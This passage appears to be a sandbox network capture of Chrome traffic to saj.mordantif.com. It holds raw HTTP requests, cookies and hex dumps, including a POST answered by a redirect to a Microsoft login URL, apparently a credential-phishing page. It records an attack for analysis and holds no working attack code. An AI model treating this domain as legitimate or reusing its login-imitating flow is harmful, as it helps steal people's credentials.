                                                        2024-09-13 13:07:07 UTC1180INData Raw: 20 31 39 38 2d 34 32 34 2e 34 34 35 20 31 32 31 35 2e 36 20 32 36 35 2e 38 20 31 32 31 35 2e 36 7a 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 44 29 22 2f 3e 3c 2f 67 3e 3c 64 65 66 73 3e 3c 72 61 64 69 61 6c 47 72 61 64 69 65 6e 74 20 69 64 3d 22 41 22 20 63 78 3d 22 30 22 20 63 79 3d 22 30 22 20 72 3d 22 31 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 67 72 61 64 69 65 6e 74 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 34 36 36 2e 34 20 33 39 33 2e 36 29 20 72 6f 74 61 74 65 28 39 30 29 20 73 63 61 6c 65 28 31 34 30 31 2e 36 20 31 37 32 30 2e 38 29 22 3e 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 31 30 37 63 31 30 22 2f 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22
                                                        Data Ascii: 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1"
                                                        2024-09-13 13:07:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        56192.168.2.549798172.67.148.274433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:07 UTC1468OUTGET /ijWVcwkWzgZ9NJntUuz6LBrGkpnmKnWNecHtytLgqr5ZMKNDQLD2TVkGk13JNueykxab223 HTTP/1.1
                                                        Host: saj.mordantif.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6T
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6ImdrN0plVFEwV1RCUnFILzFsK29BaGc9PSIsInZhbHVlIjoiOHFGZmQvNEljS2lITTVOUUJJc3FReG9FREt1dWQ5dnBGOFVZMTBMNVJoUnM4ZGcrSXl6TFBwTHozOGlvcXVmaENqYjlPRTZTbDkwUUpEVmx1dGQvSUhVejZwKzdiMDg5V0wwa2JVd21lZkNodTczMGU2SkNMRXNPRk5wcXZtamkiLCJtYWMiOiIyNjE2MzEzM2EyN2JmNzE2MTVmM2Y0MTg0NWZkM2ZhYjdmN2M3M2Y4N2QxY2Q1NTkzZmNkZDI5NDU3OTBiZDE1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlE5NUtFUmJoa1g2VmJ5amxYK0dWOXc9PSIsInZhbHVlIjoianU1aDJhQ2twSG5VY21XSVFlbDMvQUNkUnk5MFZpWGdjNnZ1TTNyRHB0VlNQSjA3U09tTFpqMVZHVVNjdm9wSGNLZGRVbUZsREF4ZWdWaUtNdXFUWFRDLzllVUVJLythNHY3TVdUcUN3ekdXakV2d0pKSkViQm1KVW5OYjdQRWEiLCJtYWMiOiIxNzQzMDQwYzFlNjM5ZWZlMGI4NzQwN2NlMGY4Njk1NDliZjdjNWU0OGYzZWNiYWJmZDgyZWQzYzg3ZDQ3MDFlIiwidGFnIjoiIn0%3D
                                                        2024-09-13 13:07:08 UTC672INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:07:07 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 1400
                                                        Connection: close
                                                        Content-Disposition: inline; filename="ijWVcwkWzgZ9NJntUuz6LBrGkpnmKnWNecHtytLgqr5ZMKNDQLD2TVkGk13JNueykxab223"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bi%2Bpe%2BYflJdG%2F7b0UqV5UwmHXvhyUYma0LFa4VpFOj8Wd3MdouIqG%2B%2BbpAkKWwknXwArcT5FMrWiVkt%2BJgfJl1rKvNN3osIZbgNEuBta%2Bf7E4yF5YKIOq66oMCWTUw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 8c285bc3e86043b8-EWR
                                                        2024-09-13 13:07:08 UTC697INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 6c 00 00 00 18 08 06 00 00 00 1f d5 18 1a 00 00 05 3f 49 44 41 54 68 43 ed 58 bd 6e 13 41 10 be 4b d2 d0 20 87 b4 48 38 bc 00 c9 13 10 37 50 c6 ee 91 70 9e 00 e7 af 26 ae f3 83 f3 04 18 89 3e 97 92 34 98 27 c0 79 81 60 24 5a c0 d0 d0 24 31 df b7 9a 39 8d 97 3b bc 91 0c 77 91 7c d2 c9 f6 7a 76 76 76 be f9 8f 7f d6 1f 8e a2 b0 e7 db dd e4 62 e9 e5 59 f4 15 e4 f7 42 b6 b4 9f 44 71 08 dd 8c 26 5c 03 f1 0c b0 70 65 95 81 72 06 58 19 50 b8 81 0c 33 c0 6e a0 ac 7f 4d da 6a b5 aa f3 f3 f3 2b a3 d1 a8 72 7d 7d 9d 74 3a 9d a1 7f 66 61 80 6d 6d 6d 35 55 18 08 d9 df df df ef e7 29 64 77 77 77 e5 ea ea 6a 85 ff c7 71 3c 3c 3c 3c 4c f8 7d 67 67 67 0d 1f eb 97 97 97 ed ac cb fd 6b 05 4f 93 3f f4 d1 c2 dd 5e 82 67
                                                        Data Ascii: PNGIHDRl?IDAThCXnAK H87Pp&>4'y`$Z$19;w|zvvvbYBDq&\perXP3nMj+r}}t:fammm5U)dwwwjq<<<<L}gggkO?^g
                                                        2024-09-13 13:07:08 UTC703INData Raw: e3 31 43 e6 07 18 cc 0f 49 f4 b4 74 ca e1 ef 65 7e 71 8a 26 e8 36 af 32 42 e0 7d c3 2a 56 ce 70 f2 9b 42 c9 f2 22 0d ef ca 27 c1 9e 4d 18 01 73 f0 73 91 99 b2 fa 1e 56 25 2d d6 3f 38 79 43 14 3f 6d 1a 1f b0 85 85 05 7a 09 15 9d 26 5d 5c 98 56 4e eb 73 1e 85 d0 f2 6a 12 60 c6 ea 19 02 6b 59 ad 82 05 0c fc 36 34 d4 59 10 ec ba 28 5f 65 61 5b e1 72 8c c8 1b 31 42 f8 e7 18 d9 1d bd 17 35 18 02 e9 c5 69 a1 75 a3 1c 16 bd fd 1e e6 61 51 f4 2b 7a b6 78 7f f4 2e fa 82 b3 82 3c 2c 7e 1a e6 61 cc 1d 10 7a 2c bc 49 85 54 87 62 da 50 ea 5e 08 60 ba 07 f2 8d 79 aa 35 38 0b 18 2c 7c 51 fb b7 bc 75 dd ab 2d 84 86 5f 95 97 ff fb 6d 85 31 1c e7 91 f6 7c 6b ac 6a 18 37 05 2c 78 f8 0b c0 96 00 58 f0 f0 17 80 65 7a b0 ef 61 04 8c 8d b4 58 de 00 8a 5c 45 98 24 80 15 2d f7 03
                                                        Data Ascii: 1CIte~q&62B}*VpB"'MssV%-?8yC?mz&]\VNsj`kY64Y(_ea[r1B5iuaQ+zx.<,~az,ITbP^`y58,|Qu-_m1|kj7,xXezaX\E$-


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        57192.168.2.549800172.67.148.274433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:07 UTC1542OUTPOST /jaG38jlE3Csa6VPdagQNh1ZGRwn6zNGNrENQrVC1wpG35UrCP39Qdzk HTTP/1.1
                                                        Host: saj.mordantif.com
                                                        Connection: keep-alive
                                                        Content-Length: 55
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        Accept: */*
                                                        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                        X-Requested-With: XMLHttpRequest
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Origin: https://saj.mordantif.com
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6T
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6ImdrN0plVFEwV1RCUnFILzFsK29BaGc9PSIsInZhbHVlIjoiOHFGZmQvNEljS2lITTVOUUJJc3FReG9FREt1dWQ5dnBGOFVZMTBMNVJoUnM4ZGcrSXl6TFBwTHozOGlvcXVmaENqYjlPRTZTbDkwUUpEVmx1dGQvSUhVejZwKzdiMDg5V0wwa2JVd21lZkNodTczMGU2SkNMRXNPRk5wcXZtamkiLCJtYWMiOiIyNjE2MzEzM2EyN2JmNzE2MTVmM2Y0MTg0NWZkM2ZhYjdmN2M3M2Y4N2QxY2Q1NTkzZmNkZDI5NDU3OTBiZDE1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlE5NUtFUmJoa1g2VmJ5amxYK0dWOXc9PSIsInZhbHVlIjoianU1aDJhQ2twSG5VY21XSVFlbDMvQUNkUnk5MFZpWGdjNnZ1TTNyRHB0VlNQSjA3U09tTFpqMVZHVVNjdm9wSGNLZGRVbUZsREF4ZWdWaUtNdXFUWFRDLzllVUVJLythNHY3TVdUcUN3ekdXakV2d0pKSkViQm1KVW5OYjdQRWEiLCJtYWMiOiIxNzQzMDQwYzFlNjM5ZWZlMGI4NzQwN2NlMGY4Njk1NDliZjdjNWU0OGYzZWNiYWJmZDgyZWQzYzg3ZDQ3MDFlIiwidGFnIjoiIn0%3D
                                                        2024-09-13 13:07:07 UTC55OUTData Raw: 70 61 67 65 6c 69 6e 6b 3d 6d 61 57 39 33 62 33 72 41 6a 25 32 46 66 49 4a 67 65 64 75 48 48 4a 41 25 33 44 25 33 44 26 74 79 70 65 3d 34 26 61 70 70 6e 75 6d 3d 31
                                                        Data Ascii: pagelink=maW93b3rAj%2FfIJgeduHHJA%3D%3D&type=4&appnum=1
                                                        2024-09-13 13:07:08 UTC995INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:07:08 GMT
                                                        Content-Type: application/json
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Cache-Control: no-cache, private
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q6yc8gnyu8wfKvSShRPUpdMbLfR98HYwC64wXDOJ4Tw2Q47bhAdrvcdtW7ieFcdcA4eshLLLL5cG2%2FeUuNasN22uTmOxoYUT7oY1w5z2Pm47vysfhxUvXF0B%2Feb2sg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Set-Cookie: XSRF-TOKEN=eyJpdiI6InhlRjF0OEtYc3Q5N2Z1OCtXemFaYVE9PSIsInZhbHVlIjoiOUVudzZJN1ZBcHZGREV0VHZQU1FLM3d0TVViRkNpTERMaUdySGNiRnIwUDdoejhQT2hwS250eEV0VGs4MHNsak5nbjF1SmdXOHhXSVlqdUpqMmtjbUM3N21XQ2EvYXB3TnJ1THZEeTdFc0Z6N2M4TFcxYkM3RUhHTmE2Ym9zVFkiLCJtYWMiOiIwMDIwMzBiYTc4YWQzZTA2OWE0NTgzMjk1NDJkMjVhNWVkN2M0ZjlmMDVkNGIyYjk2MDhjY2VkYTRkM2Q2ODhjIiwidGFnIjoiIn0%3D; expires=Fri, 13-Sep-2024 15:07:07 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                        2024-09-13 13:07:08 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6e 6c 6b 61 6e 4a 42 61 32 56 58 53 57 64 69 54 45 52 33 5a 46 51 31 64 58 42 71 55 45 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 59 6b 74 36 4d 55 31 54 53 6d 31 79 4d 7a 52 4f 61 6b 4a 6c 4e 47 73 79 56 33 55 76 56 6b 5a 69 4d 6b 64 76 65 6d 31 32 63 30 46 30 4f 47 68 44 4d 58 4e 6c 55 46 42 77 54 6d 56 31 4c 32 52 78 52 45 70 46 5a 56 41 72 51 6e 63 35 65 56 68 44 55 45 74 4a 57 56 56 50 5a 33 4a 44 62 32 4e 32 54 46 4a 4c 59 30 49 32 51 32 63 79 54 6a 42 55 4c 7a 56 6e 52 57 52 42 55 45 4d 35 52 79 74 42 4e 31 56 36 5a 46 6c 68 55 57 73 30 55 6e 46 34 5a 48 41 34 4d 46 70 31 4b 7a 5a 43 4e 45 73 35 63 6a 63 7a 51 56 5a 78 64 33 45
                                                        Data Ascii: Set-Cookie: laravel_session=eyJpdiI6InlkanJBa2VXSWdiTER3ZFQ1dXBqUEE9PSIsInZhbHVlIjoiYkt6MU1TSm1yMzROakJlNGsyV3UvVkZiMkdvem12c0F0OGhDMXNlUFBwTmV1L2RxREpFZVArQnc5eVhDUEtJWVVPZ3JDb2N2TFJLY0I2Q2cyTjBULzVnRWRBUEM5RytBN1V6ZFlhUWs0UnF4ZHA4MFp1KzZCNEs5cjczQVZxd3E
                                                        2024-09-13 13:07:08 UTC97INData Raw: 35 62 0d 0a 7b 22 65 78 70 69 72 65 64 22 3a 30 2c 22 72 65 64 69 72 65 63 74 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 6f 67 69 6e 2e 6d 69 63 72 6f 73 6f 66 74 6f 6e 6c 69 6e 65 2e 63 6f 6d 5c 2f 63 6f 6d 6d 6f 6e 5c 2f 53 41 53 5c 2f 50 72 6f 63 65 73 73 41 75 74 68 22 7d 0d 0a
                                                        Data Ascii: 5b{"expired":0,"redirecturl":"https:\/\/login.microsoftonline.com\/common\/SAS\/ProcessAuth"}
                                                        2024-09-13 13:07:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        58192.168.2.54980118.239.50.44433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:08 UTC374OUTGET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1
                                                        Host: ok4static.oktacdn.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-09-13 13:07:08 UTC683INHTTP/1.1 200 OK
                                                        Content-Type: image/png
                                                        Content-Length: 10796
                                                        Connection: close
                                                        Date: Thu, 12 Sep 2024 16:36:40 GMT
                                                        Server: nginx
                                                        Last-Modified: Tue, 23 Feb 2021 04:20:08 GMT
                                                        ETag: "12bdacc832185d0367ecc23fd24c86ce"
                                                        Expires: Fri, 12 Sep 2025 16:36:40 GMT
                                                        Cache-Control: max-age=31536000
                                                        Cache-Control: public,max-age=31536000,s-maxage=1814400
                                                        Strict-Transport-Security: max-age=315360000; includeSubDomains
                                                        Access-Control-Allow-Origin: *
                                                        Accept-Ranges: bytes
                                                        X-Cache: Hit from cloudfront
                                                        Via: 1.1 b744839339b269ebb49818cc6c300b6a.cloudfront.net (CloudFront)
                                                        X-Amz-Cf-Pop: AMS58-P3
                                                        X-Amz-Cf-Id: fKXGC-HzSg1I6Xu7Wk29u0erxgNBIaGtxRi9eOH6xgS-UbHRViq_lA==
                                                        Age: 73828
                                                        2024-09-13 13:07:08 UTC10796INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 a4 00 00 00 5e 08 06 00 00 00 6c 32 60 fe 00 00 29 f3 49 44 41 54 78 da ed 7d 09 9c 1c 55 9d ff a0 8b 20 77 a6 eb bd 1a 42 10 10 50 24 8a 48 76 09 c9 74 d5 ab ea 09 91 b8 a0 78 84 45 41 40 04 51 60 81 45 14 d0 15 02 88 c8 2d ec 8a 9c 22 97 28 e7 9f e5 58 60 89 11 44 2e c3 11 c8 35 5d 5d 55 7d cd 95 c9 9d 90 83 24 33 ff df af aa 26 e9 cc bc d7 67 75 4f 77 cf fb 7d 3e ef 13 98 99 ae 7e f5 8e df f7 77 ff 5a 5a 9a 84 12 7a eb be 96 d6 46 5a 24 49 92 24 49 92 a4 d1 a0 b8 4e fe b3 c7 a4 9d 09 9d ac 74 74 b2 24 65 90 c5 09 4d f9 c5 bc e9 ea ae 72 75 24 49 92 24 49 52 d5 68 81 41 76 4b 30 c5 74 19 b9 77 79 87 3a 98 31 e8 a0 a5 93 c1 44 ce 48 c3 cf d6 4c 53 07 01 98 92 69 46 7e b6 58 8f c4 e0 73 6d 72 f5 24
                                                        Data Ascii: PNGIHDR^l2`)IDATx}U wBP$HvtxEA@Q`E-"(X`D.5]]U}$3&guOw}>~wZZzFZ$I$INtt$eMru$I$IRhAvK0twy:1DHLSiF~Xsmr$


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        59192.168.2.549809104.21.55.1244433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:09 UTC1119OUTGET /jaG38jlE3Csa6VPdagQNh1ZGRwn6zNGNrENQrVC1wpG35UrCP39Qdzk HTTP/1.1
                                                        Host: saj.mordantif.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6InhlRjF0OEtYc3Q5N2Z1OCtXemFaYVE9PSIsInZhbHVlIjoiOUVudzZJN1ZBcHZGREV0VHZQU1FLM3d0TVViRkNpTERMaUdySGNiRnIwUDdoejhQT2hwS250eEV0VGs4MHNsak5nbjF1SmdXOHhXSVlqdUpqMmtjbUM3N21XQ2EvYXB3TnJ1THZEeTdFc0Z6N2M4TFcxYkM3RUhHTmE2Ym9zVFkiLCJtYWMiOiIwMDIwMzBiYTc4YWQzZTA2OWE0NTgzMjk1NDJkMjVhNWVkN2M0ZjlmMDVkNGIyYjk2MDhjY2VkYTRkM2Q2ODhjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlkanJBa2VXSWdiTER3ZFQ1dXBqUEE9PSIsInZhbHVlIjoiYkt6MU1TSm1yMzROakJlNGsyV3UvVkZiMkdvem12c0F0OGhDMXNlUFBwTmV1L2RxREpFZVArQnc5eVhDUEtJWVVPZ3JDb2N2TFJLY0I2Q2cyTjBULzVnRWRBUEM5RytBN1V6ZFlhUWs0UnF4ZHA4MFp1KzZCNEs5cjczQVZxd3EiLCJtYWMiOiJiNzYyNDY3Yjg3MTNjNDYyODk3M2FlNjRmM2FmZDk4YTlkYTE1NWZiMjI1N2ZkZGViM2M3MTI3NjEwMzVmODliIiwidGFnIjoiIn0%3D
                                                        2024-09-13 13:07:10 UTC587INHTTP/1.1 404 Not Found
                                                        Date: Fri, 13 Sep 2024 13:07:09 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8S6BKE6tBpw4tM%2Bk8x7MJyl1nKdBRs%2F%2BhtbAm5TesmaGo1e8rLuNO%2F312ofE8S7yWtKUEutDQrsh9K5z9ZqtC7%2B6%2F1au0ONqz%2Fcxov32uY1yVBld9qNybLDN7AlL5g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 8c285bcdeb914407-EWR
                                                        2024-09-13 13:07:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        60192.168.2.549812104.21.55.124443
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:09 UTC1135OUTGET /kl1XjPKHnGhRdwLFWhMa3e96JMl95nsR8rSBiwellijqABwBMDvlTUNJo62aBcHTGWwx220 HTTP/1.1
                                                        Host: saj.mordantif.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6InhlRjF0OEtYc3Q5N2Z1OCtXemFaYVE9PSIsInZhbHVlIjoiOUVudzZJN1ZBcHZGREV0VHZQU1FLM3d0TVViRkNpTERMaUdySGNiRnIwUDdoejhQT2hwS250eEV0VGs4MHNsak5nbjF1SmdXOHhXSVlqdUpqMmtjbUM3N21XQ2EvYXB3TnJ1THZEeTdFc0Z6N2M4TFcxYkM3RUhHTmE2Ym9zVFkiLCJtYWMiOiIwMDIwMzBiYTc4YWQzZTA2OWE0NTgzMjk1NDJkMjVhNWVkN2M0ZjlmMDVkNGIyYjk2MDhjY2VkYTRkM2Q2ODhjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlkanJBa2VXSWdiTER3ZFQ1dXBqUEE9PSIsInZhbHVlIjoiYkt6MU1TSm1yMzROakJlNGsyV3UvVkZiMkdvem12c0F0OGhDMXNlUFBwTmV1L2RxREpFZVArQnc5eVhDUEtJWVVPZ3JDb2N2TFJLY0I2Q2cyTjBULzVnRWRBUEM5RytBN1V6ZFlhUWs0UnF4ZHA4MFp1KzZCNEs5cjczQVZxd3EiLCJtYWMiOiJiNzYyNDY3Yjg3MTNjNDYyODk3M2FlNjRmM2FmZDk4YTlkYTE1NWZiMjI1N2ZkZGViM2M3MTI3NjEwMzVmODliIiwidGFnIjoiIn0%3D
                                                        2024-09-13 13:07:09 UTC680INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:07:09 GMT
                                                        Content-Type: image/svg+xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Content-Disposition: inline; filename="kl1XjPKHnGhRdwLFWhMa3e96JMl95nsR8rSBiwellijqABwBMDvlTUNJo62aBcHTGWwx220"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MlVc%2FCUOOJfgsenzKM1YatsH84GwuNzn%2BL6DTPEGUcPlHpf6gGqQaAc05MLIG%2FOfNOv21%2BfSqu9mY9bp1sMfecKHaoGj%2BaoqEeEX%2FcwUH4qsYljlGCYaMiOJgKaKCw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 8c285bcdcf990cdd-EWR
                                                        2024-09-13 13:07:09 UTC689INData Raw: 37 34 38 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31
                                                        Data Ascii: 748<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1
                                                        2024-09-13 13:07:09 UTC1182INData Raw: 38 34 20 31 39 38 2d 34 32 34 2e 34 34 35 20 31 32 31 35 2e 36 20 32 36 35 2e 38 20 31 32 31 35 2e 36 7a 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 44 29 22 2f 3e 3c 2f 67 3e 3c 64 65 66 73 3e 3c 72 61 64 69 61 6c 47 72 61 64 69 65 6e 74 20 69 64 3d 22 41 22 20 63 78 3d 22 30 22 20 63 79 3d 22 30 22 20 72 3d 22 31 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 67 72 61 64 69 65 6e 74 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 34 36 36 2e 34 20 33 39 33 2e 36 29 20 72 6f 74 61 74 65 28 39 30 29 20 73 63 61 6c 65 28 31 34 30 31 2e 36 20 31 37 32 30 2e 38 29 22 3e 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 31 30 37 63 31 30 22 2f 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22
                                                        Data Ascii: 84 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="
                                                        2024-09-13 13:07:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        61192.168.2.549811104.21.55.1244433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:09 UTC1135OUTGET /ijWVcwkWzgZ9NJntUuz6LBrGkpnmKnWNecHtytLgqr5ZMKNDQLD2TVkGk13JNueykxab223 HTTP/1.1
                                                        Host: saj.mordantif.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
